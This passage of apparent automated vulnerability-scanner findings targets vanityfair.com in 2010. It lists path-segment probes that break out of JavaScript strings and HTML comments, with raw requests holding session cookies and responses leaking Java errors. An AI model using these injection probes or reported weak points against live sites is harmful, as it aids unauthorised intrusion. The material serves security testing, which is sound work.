GET /online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.html9f353-->478b8db9bd1 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:26 GMT Date: Mon, 29 Nov 2010 16:49:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47881
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efe88'%3b3f9e49ed51f was submitted in the REST URL parameter 5. This input was echoed as efe88';3f9e49ed51f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.htmlefe88'%3b3f9e49ed51f HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:22 GMT Date: Mon, 29 Nov 2010 16:49:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44667
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... ipt type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/11/nightmare-before-thanksgiving-tim-burton-takes-toronto.htmlefe88';3f9e49ed51f', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload f64f3-->e11d1f0ee62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010f64f3-->e11d1f0ee62/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:34 GMT Date: Mon, 29 Nov 2010 16:48:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47894
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbc58'%3b20581f0ffed was submitted in the REST URL parameter 3. This input was echoed as cbc58';20581f0ffed in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010cbc58'%3b20581f0ffed/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:32 GMT Date: Mon, 29 Nov 2010 16:48:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44670
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010cbc58';20581f0ffed/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24130'%3b44209b0f25b was submitted in the REST URL parameter 4. This input was echoed as 24130';44209b0f25b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/1124130'%3b44209b0f25b/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:54 GMT Date: Mon, 29 Nov 2010 16:48:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44668
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/1124130';44209b0f25b/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that dri ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 9629c-->b819dc14f35 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/119629c-->b819dc14f35/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:57 GMT Date: Mon, 29 Nov 2010 16:48:57 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... use bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[1807793583]:- Thread id: 40. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/119629c-->b819dc14f35/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html?proxyuri=online%2Fdaily%2F2010%2F119629c--%3Eb819dc14f35%2Frich-hypocrites-secertly-enjoy-the-meatpacking-district.html': escaped absolute ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload c68ab-->08e5cc5b50f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.htmlc68ab-->08e5cc5b50f HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:11 GMT Date: Mon, 29 Nov 2010 16:49:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47894
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]...
-:[376882714]:- Thread id: 39. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.htmlc68ab-->08e5cc5b50f?proxyuri=online%2Fdaily%2F2010%2F11%2Frich-hypocrites-secertly-enjoy-the-meatpacking-district.htmlc68ab--%3E08e5cc5b50f': escaped absolute path not valid. -> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20d3b'%3b0d199b8ec01 was submitted in the REST URL parameter 5. This input was echoed as 20d3b';0d199b8ec01 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html20d3b'%3b0d199b8ec01 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:09 GMT Date: Mon, 29 Nov 2010 16:49:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44668
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... pt type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html20d3b';0d199b8ec01', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a5d0'%3beff2d52ba02 was submitted in the REST URL parameter 3. This input was echoed as 8a5d0';eff2d52ba02 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/20108a5d0'%3beff2d52ba02/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:51 GMT Date: Mon, 29 Nov 2010 16:48:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/20108a5d0';eff2d52ba02/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 1f362-->1d62bf51d02 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/20101f362-->1d62bf51d02/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:58:56 GMT Date: Mon, 29 Nov 2010 16:48:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47907
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload 9dc33-->486fec74ffd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/daily/2010/119dc33-->486fec74ffd/unanswered-questions-concerning-the-mean-girls-2-trailer.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:09 GMT Date: Mon, 29 Nov 2010 16:49:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47907
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... use bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[1310428048]:- Thread id: 39. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/119dc33-->486fec74ffd/unanswered-questions-concerning-the-mean-girls-2-trailer.html?proxyuri=online%2Fdaily%2F2010%2F119dc33--%3E486fec74ffd%2Funanswered-questions-concerning-the-mean-girls-2-trailer.html': escaped absolut ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c33a3'%3b4b284b82c25 was submitted in the REST URL parameter 4. This input was echoed as c33a3';4b284b82c25 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/daily/2010/11c33a3'%3b4b284b82c25/unanswered-questions-concerning-the-mean-girls-2-trailer.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 16:59:08 GMT Date: Mon, 29 Nov 2010 16:49:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44671
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/daily/2010/11c33a3';4b284b82c25/unanswered-questions-concerning-the-mean-girls-2-trailer.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that dr ...[SNIP]...
